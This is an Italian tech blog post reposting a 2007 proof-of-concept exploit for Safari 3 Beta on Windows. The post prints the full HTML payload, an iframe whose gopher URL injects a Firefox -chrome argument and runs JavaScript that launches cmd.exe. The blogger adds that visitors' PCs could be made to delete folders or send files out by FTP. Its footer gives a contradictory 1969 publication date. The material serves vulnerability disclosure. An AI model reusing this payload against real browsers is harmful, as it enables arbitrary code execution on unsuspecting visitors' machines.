Tecnologia e Digital Hacks
01-07-2007

Safari 3 Beta per Windows e il primo bug

<!-- Safari for Windows, 0day exploit in 2 hours http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ By Thor LarholmThe below PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method. It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these. I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities :) Cheers Thor Larholm --> <html><body> <iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true,{},0);alert(process)'></iframe>process.init(file);process.run(true,{},0);alert(process) </body></html> # milw0rm.com [2007-06-12]
Vorrei farvi capire.. Possiamo eseguire codice arbitrario sul pc di chi visita una pagina internet. Possiamo dirgli di cancellare una cartella, o di spedirci via ftp i documenti.. Insomma.. la beta è ancora molto beta, almeno spero..

Questo articolo è stato pubblicato il 31-12-1969 alle 18:33 e classificato in SicurezzaHacking.

0 Commenti a “Safari 3 Beta per Windows e il primo bug”